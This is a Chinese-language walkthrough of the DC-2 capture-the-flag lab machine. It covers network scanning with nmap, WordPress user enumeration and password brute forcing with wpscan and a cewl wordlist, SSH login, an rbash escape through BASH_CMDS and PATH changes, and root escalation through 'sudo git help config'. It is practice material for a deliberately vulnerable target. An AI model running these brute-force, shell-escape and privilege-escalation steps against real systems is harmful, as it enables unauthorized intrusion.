搭建环境

  靶场下载地址：链接：https://pan.baidu.com/s/1uil0Imx0qAfFjxgK4INwhQ 
提取码：1234

  虚拟机环境下载地址：链接：https://pan.baidu.com/s/1yCqLQKW37TASQqCuZtoLEQ 
提取码：1234        

  基本环境准备好之后，部署DC2靶场，打开VMware之后，点击文件 -> 打开 -> 选择下载好的DC2中的DC-2.ova，输入虚拟机名称和选择存储路径，点击导入，一般会弹出导入失败的对话框，不用理，直接点击重试。导入完成之后，配置网络，这里得注意，DC2所处的网段跟kali所处的网段得互通，双击网络适配器，这里我选择的是桥接模式，kali和DC2都是桥接模式。

   配置好之后，打开kali和DC2

信息收集

  kali打开终端，由于kali和DC1都是桥接模式，所以属于同一网站段，使用arp-scan -l，查看网段所有的主机。得到DC2的IP地址。（172.163.1.46）

 使用nmap对DC2开放的端口进行扫描，nmap -A -p- 172.163.1.46

-A:选定用于使用进攻性方式扫描

-p :扫描指定的端口

 可以发现开放了80端口，网页服务器但是可以看出做了域名解析，所以需要在本地即kali的配置文件/etc/hosts文件写入172.163.1.46 dc-2即可完成本地域名解析。

 浏览器输入域名，进入网站，可以看出网站是由WordPress内容管理系统搭建的。还开放了7744端口，可以知道使用协议是ssh，所以可以远程连接。

漏洞分析

 查看flag1中的内容，cewl是一个网页关键字抓取工具(抓取网页上的关键字，作为密码字典)，WordPress有一个kali自带扫描工具wpscan可以爆破网站的用户名（WPScan是专门检查WordPress网站漏洞的工具，它可以全面检查wp网站的漏洞，），所以想到了用关键字作为密码继续进行爆破。

在根目录下创建dc文件夹：mkdir /dc/dc2 cd /dc/dc2（目录随便，我是为了方便，新建了DC目录）

漏洞利用

wpscan --url dc-2 -e u可以查看网站用户，得出结果有三个用户admin,jerry,tom,将这三个用户保存在us.txt文件中,在dc2中vim dc2_us.txt，将得到的用户名写入dc2_us,txt中。

 

 cewl dc-2 -w pds.txt将网站首页下的关键词生成密码字典pds.txt.

 wpscan --url dc-2 -U us.txt -P pds.txt爆破口令。

 爆破出两个口令。WordPrss默认后台路径为wp-admin。在url栏输入dc-2/wp-admin。登陆jerry/adipiscing。直接发现flag2.

 根据提示不能从WordPrss上面找到捷径，这是时想到了还有7744端口，因为它是ssh协议所以直接尝试ssh连接。由于端口号不是22，所以需要用-p 7744指定端口号。ssh tom@172.163.1.46 -p 7744

 除了ls，其他命令都不能使用，虽然发现了flag3.txt，但是读取不了，受到rbash环境的限制，需要绕过rbash限制（https://blog.csdn.net/weixin_43705814/article/details/111879362）。执行以下命令进行绕过

BASH_CMDS[a]=/bin/sh;a 注：把/bin/bash给a变量

export PATH=$PATH:/bin/ 注：将/bin作为PATH环境变量导出

export PATH=$PATH:/usr/bin 著：将/usr/bin作为PATH环境变量导出

 成功拿到flag3.txt

 根据flag3的提示需要su jerry/adipiscing。进去之后在tom目录下，cd /jerry切换到jerry目录下，直接在jerry根目录下拿到flag4.

 提权

git提权，根据提示需要拿到root权限执行命令sudo -l发现git不需要命令具有root权限执行。于是强制进入git交互模式。输入命令sudo git help config。在里面直接输入!/bin/bash按回车。id查看当前用户为root，切换到/root，拿到final-flag.txt。